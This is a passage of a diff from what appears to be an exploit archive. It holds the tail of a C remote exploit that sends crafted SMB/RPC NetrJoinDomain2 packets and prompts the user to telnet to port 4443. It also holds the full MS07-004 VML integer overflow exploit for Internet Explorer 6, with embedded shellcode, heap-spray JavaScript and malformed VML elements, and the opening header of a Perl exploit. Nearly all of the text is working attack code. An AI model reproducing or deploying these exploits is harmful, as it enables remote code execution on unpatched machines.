+ memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2);  //update treeid
+
+
+ ret=send(sock,(char
+*)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
+ if (ret<=0)
+ {
+ printf("send NTCreate_AndX_Request error!\n");
+ return;
+ }
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+
+
+ fid=*(WORD *)(recvbuff+0x2a);        //get fid
+
+
+ //rpc bind
+
+ memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
+ memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
+ memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
+ *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);
+
+ ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
+ if (ret<=0)
+ {
+ printf("send Rpc_Bind_Wkssvc error!\n");
+ return;
+ }
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+
+
+ MakeAttackPacket((char *)argv[2]);
+
+
+ memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
+ memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
+ memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
+ *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);
+
+ *(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58;  //update Total Data Count
+ *(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58;  //update Data Count
+ *(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47;  //update Byte Count
+ *(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58;  //update Frag Length
+
+ ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
+ if (ret<=0)
+ {
+ printf("send Rpc_NetrJoinDomain2 error!\n");
+ return;
+ }
+
+ printf("[+] Sent attack packet successfully, Try telnet on %s:4443?\n",argv[1]);
+
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+
+
+
+
+ closesocket(sock);
+
+}
+
+// milw0rm.com [2006-11-17]

platforms/windows/remote/3137.html

@@ -1,194 +1,194 @@
-<!--
-
-MS07-004 VML integer overflow exploit
-  by lifeasageek at gmail.com
-
-- Trigger CVMLRecolorinfo::InternalLoad() method
- you can see the screen captured image "http://picasaweb.google.com/lifeasageek/MS07004/photo?pli=1#5019163989136880322"
- which is generated by DarunGrim
-
-- tested on WinXP SP2 Korean version( fully patched except kb929969)  & IE 6.0
- and I hope it works well in English version
-
-- sorry about that exploit hit ratio is only about 1/5
- If you have any good idea to improve reliability, please send me an
-e-mail with your idea
-
-- all the java script codes scratched from MS06-055 exploit written by Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>
-  and slightly modified
-
-- 2007.1.15
-
--->
-
-<html xmlns:v="urn:schemas-microsoft-com:vml">
-
-<head>
-<object id="VMLRender"
-classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
-</object>
-<style>
-v\:* { behavior: url(#VMLRender); }
-</style>
-</head>
-
-<body>
-
-<SCRIPT language="javascript">
-shellcode =
-unescape("%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
-
-bigblock = unescape("%u0505%u0505");
-headersize = 20;
-slackspace = headersize+shellcode.length;
-while (bigblock.length<slackspace) bigblock+=bigblock;
-fillblock = bigblock.substring(0, slackspace);
-block = bigblock.substring(0, bigblock.length-slackspace);
-while(block.length+slackspace<0x40000) block = block+block+fillblock;
-memory = new Array();
-for (i=0;i<350;i++) memory[i] = block + shellcode;
-
-</script>
-
-<v:rect style='width:120pt;height:80pt' fillcolor="red" >
-<v:recolorinfo recolorstate="t" numcolors="97612895">
-
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v/recolorinfo>
-</html>
-
-# milw0rm.com [2007-01-16]
+<!--
+
+MS07-004 VML integer overflow exploit
+  by lifeasageek at gmail.com
+
+- Trigger CVMLRecolorinfo::InternalLoad() method
+ you can see the screen captured image "http://picasaweb.google.com/lifeasageek/MS07004/photo?pli=1#5019163989136880322"
+ which is generated by DarunGrim
+
+- tested on WinXP SP2 Korean version( fully patched except kb929969)  & IE 6.0
+ and I hope it works well in English version
+
+- sorry about that exploit hit ratio is only about 1/5
+ If you have any good idea to improve reliability, please send me an
+e-mail with your idea
+
+- all the java script codes scratched from MS06-055 exploit written by Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>
+  and slightly modified
+
+- 2007.1.15
+
+-->
+
+<html xmlns:v="urn:schemas-microsoft-com:vml">
+
+<head>
+<object id="VMLRender"
+classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
+</object>
+<style>
+v\:* { behavior: url(#VMLRender); }
+</style>
+</head>
+
+<body>
+
+<SCRIPT language="javascript">
+shellcode =
+unescape("%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
+
+bigblock = unescape("%u0505%u0505");
+headersize = 20;
+slackspace = headersize+shellcode.length;
+while (bigblock.length<slackspace) bigblock+=bigblock;
+fillblock = bigblock.substring(0, slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+memory = new Array();
+for (i=0;i<350;i++) memory[i] = block + shellcode;
+
+</script>
+
+<v:rect style='width:120pt;height:80pt' fillcolor="red" >
+<v:recolorinfo recolorstate="t" numcolors="97612895">
+
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v/recolorinfo>
+</html>
+
+# milw0rm.com [2007-01-16]

platforms/windows/remote/3148.pl

@@ -1,255 +1,255 @@
-#(c) pang0 // www.tcbilisim.org
-#bug found3d by LifeAsaGeek
-#thx => o.g. / chaos / sakkure / stansar / xoron
